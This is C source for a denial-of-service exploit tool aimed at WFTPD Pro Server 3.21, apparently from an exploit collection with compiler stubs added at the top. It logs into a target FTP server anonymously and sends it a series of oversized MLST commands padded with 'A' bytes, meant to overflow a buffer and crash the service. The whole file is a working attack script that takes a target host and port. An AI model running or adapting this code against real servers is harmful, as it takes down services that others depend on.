
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int WSADATA ;
typedef scalar_t__ SOCKET ;


 int BUFFSIZE ;
 int MAKEWORD (int,int) ;
 int OVERFLOWSIZE ;
 int Sleep (int) ;
 int WSACleanup () ;
 int WSAStartup (int ,int *) ;
 int atoi (char*) ;
 int client_connect (scalar_t__,char*,int ) ;
 int closesocket (scalar_t__) ;
 scalar_t__ create_socket () ;
 int exit (int) ;
 int loginftp (scalar_t__,char*,char*) ;
 int memcpy (char*,char*,int) ;
 int memset (char*,char,int) ;
 int printf (char*,...) ;
 int readbuf (char*,scalar_t__,int ,int) ;
 int recvbuf ;
 char* sendbuf ;
 int show ;
 int sprintf (char*,char*,char*) ;
 int strlen (char*) ;
 int writebuf (char*,scalar_t__,char*,int) ;

void main(int argc, char *argv[])
{
    WSADATA wsa;
    unsigned short port;
    unsigned long ip;
    char user[32] = "anonymous";
    char pass[32] = "anonymous";
    int i;

    char *command = "MLST ";

    SOCKET s;
    int size = OVERFLOWSIZE;

    printf("WFTPD Pro Server 3.21 MLST DoS Exploit\r\n");
        printf("lion lion#cnhonker.net, http://www.cnhonker.com\r\n\n");

    if(argc < 3)
    {
        printf("%s <TargetHost> <TargetPort>\r\n", argv[0]);
        return;
    }

    WSAStartup(MAKEWORD(2,2),&wsa);

    if((s=create_socket())==0)
    {
        printf("[-] ERROR: Create socket failed.\r\n");
        return;
    }

    if(!client_connect(s, argv[1], atoi(argv[2])))
        exit(-1);

    loginftp(s, user, pass);

    memset(sendbuf, 0 ,BUFFSIZE);
    memcpy(sendbuf, "pasv\r\n", 6);
    writebuf("Send pasv", s, sendbuf, 6);
    readbuf("read", s, recvbuf, BUFFSIZE);

    for(i=0;i<60;i++,size++)
    {
        memset(sendbuf, 0, BUFFSIZE);
        memset(sendbuf, 'A', size);
        memcpy(sendbuf, command, strlen(command));
        sendbuf[size-2] ='\r';
        sendbuf[size-1] ='\n';

        printf("buff size :%d\r\n%s\r\n", strlen(sendbuf), sendbuf);
        show=1;
        writebuf("Send overflow buff", s, sendbuf, size);
        readbuf("read", s, recvbuf, BUFFSIZE);
        Sleep(500);
    }


    memset(sendbuf,0, BUFFSIZE);
    sprintf(sendbuf, "%s\r\n", "QUIT");
    writebuf("Send QUIT", s, sendbuf, strlen(sendbuf));





    if(s)
        closesocket(s);

    WSACleanup();
}
